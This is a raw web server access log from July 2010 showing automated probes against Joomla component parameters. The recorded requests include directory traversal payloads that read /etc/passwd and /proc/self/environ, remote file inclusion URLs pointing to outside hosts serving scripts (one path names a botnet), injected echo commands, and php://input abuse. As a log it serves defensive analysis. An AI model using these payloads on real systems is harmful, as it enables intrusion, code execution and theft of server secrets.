95.141.32.178 - - [27/Jul/2010:06:05:18 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:05:19 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:05:19 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:06:59 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:09:53 +0200] "GET //index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:11:42 +0200] "GET /logs/access_log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:11:42 +0200] "GET //index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:11:42 +0200] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:12:15 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:12:16 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:12:16 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:06:13:09 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:06:13:09 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:06:13:10 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:06:13:10 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:14:23 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:15:52 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:15:52 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:06:15:53 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:17:32 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:21:45 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.23.213.213 - - [27/Jul/2010:06:21:57 +0200] "GET /logs/access_log//////////index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:21:57 +0200] "GET //////////index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:21:58 +0200] "GET /logs//////////index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:22:00 +0200] "GET /logs/access_log//////////*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:22:00 +0200] "GET //////////*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:22:00 +0200] "GET /logs//////////*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:22:06 +0200] "GET /logs/access_log//////////*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:22:06 +0200] "GET //////////*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:22:06 +0200] "GET /logs//////////*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:22:21 +0200] "GET /logs/access_log//////////index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:22:21 +0200] "GET //////////index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:22:21 +0200] "GET /logs//////////index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:23:07 +0200] "GET /logs/access_log//////////index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:23:07 +0200] "GET //////////index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.803"
94.23.213.213 - - [27/Jul/2010:06:23:07 +0200] "GET /logs//////////index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:23:13 +0200] "GET /logs/access_log//////////index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:23:13 +0200] "GET //////////index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.803"
91.121.132.97 - - [27/Jul/2010:06:23:13 +0200] "GET /logs//////////index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-" "libwww-perl/5.803"
119.192.145.144 - - [27/Jul/2010:06:23:49 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:23:50 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:23:50 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
87.98.217.83 - - [27/Jul/2010:06:31:26 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:31:26 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
213.215.178.34 - - [27/Jul/2010:06:36:29 +0200] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:06:41:04 +0200] "GET /logs/access_log/index.php?option=com_google&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:06:41:05 +0200] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:06:41:05 +0200] "GET /logs/index.php?option=com_google&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:06:47:51 +0200] "POST /index.php?option=com_google&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.98.217.83 - - [27/Jul/2010:06:51:18 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:51:19 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:51:19 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:51:28 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:51:28 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:51:29 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
213.215.178.34 - - [27/Jul/2010:06:51:42 +0200] "POST /logs/access_log/index.php?option=com_google&controller=php://input HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:06:51:42 +0200] "POST /index.php?option=com_google&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:06:51:42 +0200] "POST /logs/index.php?option=com_google&controller=php://input HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.211.71.21 - - [27/Jul/2010:06:53:44 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 336 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:53:44 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 320 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:53:44 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 336 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:53:45 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 320 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:53:45 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 325 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:53:45 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 325 "-" "MaMa CaSpEr"
69.175.118.101 - - [27/Jul/2010:07:00:39 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:00:39 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:00:39 +0200] "GET /logs/access_log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
209.126.254.12 - - [27/Jul/2010:07:00:57 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 320 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:57 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 325 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:57 +0200] "GET /logs/access_log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 338 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:57 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 325 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:57 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 320 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:57 +0200] "GET /logs/access_log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 338 "-" "MaMa CaSpEr"
188.165.213.8 - - [27/Jul/2010:07:04:41 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:07:10:24 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:10:43 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
69.175.118.101 - - [27/Jul/2010:07:11:56 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:11:56 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:11:56 +0200] "GET /logs/access_log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
114.108.151.149 - - [27/Jul/2010:07:13:02 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
222.124.212.222 - - [27/Jul/2010:07:14:19 +0200] "GET /?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.823"
69.175.118.101 - - [27/Jul/2010:07:16:48 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:16:48 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:16:48 +0200] "GET /logs/access_log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
121.78.118.123 - - [27/Jul/2010:07:18:15 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
188.165.213.8 - - [27/Jul/2010:07:20:13 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:07:20:13 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:07:20:13 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.803"
222.124.212.222 - - [27/Jul/2010:07:21:40 +0200] "GET /logs/access_log/?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.823"
222.124.212.222 - - [27/Jul/2010:07:21:41 +0200] "GET /?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.823"
222.124.212.222 - - [27/Jul/2010:07:21:44 +0200] "GET /logs/?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.823"
114.108.151.149 - - [27/Jul/2010:07:22:44 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:07:23:56 +0200] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.darbro.co.uk//e107_page/Ckrid1.txt?? HTTP/1.1" 200 797 "-" "MaMa CaSpEr"
72.55.153.180 - - [27/Jul/2010:07:23:56 +0200] "GET /?option=com_ninjarsssyndicator&controller=http://www.darbro.co.uk//e107_page/Ckrid1.txt?? HTTP/1.1" 200 560 "-" "MaMa CaSpEr"
72.55.153.180 - - [27/Jul/2010:07:23:56 +0200] "GET /?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 560 "-" "MaMa CaSpEr"
72.55.153.180 - - [27/Jul/2010:07:23:56 +0200] "GET /logs/?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 797 "-" "MaMa CaSpEr"
72.55.153.180 - - [27/Jul/2010:07:23:56 +0200] "GET /logs/access_log/?option=com_ninjarsssyndicator&controller=http://www.darbro.co.uk//e107_page/Ckrid1.txt?? HTTP/1.1" 404 303 "-" "MaMa CaSpEr"
72.55.153.180 - - [27/Jul/2010:07:23:56 +0200] "GET /logs/access_log/?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 303 "-" "MaMa CaSpEr"
114.108.151.149 - - [27/Jul/2010:07:34:01 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:07:34:01 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:07:34:02 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
209.126.254.12 - - [27/Jul/2010:07:44:32 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 336 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:44:33 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 336 "-" "MaMa CaSpEr"
121.78.118.123 - - [27/Jul/2010:07:48:31 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:48:32 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:48:32 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
69.175.118.101 - - [27/Jul/2010:07:54:50 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:54:50 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:54:50 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
121.78.118.123 - - [27/Jul/2010:07:57:20 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:57:21 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:57:22 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
69.175.118.101 - - [27/Jul/2010:08:00:21 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:08:00:21 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:08:00:21 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
190.202.108.90 - - [27/Jul/2010:08:09:48 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
190.202.108.90 - - [27/Jul/2010:08:09:48 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
190.202.108.90 - - [27/Jul/2010:08:09:48 +0200] "GET /logs/access_log%20%20//index.php?option=com_ninjarsssyndicator&controller=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
62.44.82.118 - - [27/Jul/2010:08:10:02 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:10:03 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:10:45 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:10:45 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:08:21:03 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:08:21:03 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:08:21:04 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
69.175.118.101 - - [27/Jul/2010:08:22:50 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:08:22:50 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:08:22:50 +0200] "GET /logs/access_log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
80.249.165.44 - - [27/Jul/2010:08:35:55 +0200] "GET /index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 296 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:35:55 +0200] "GET /logs/access_log%20%20/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 314 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:35:56 +0200] "GET /logs/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 301 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:41:36 +0200] "GET /index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 296 "-" "plaNETWORK Bot Search"
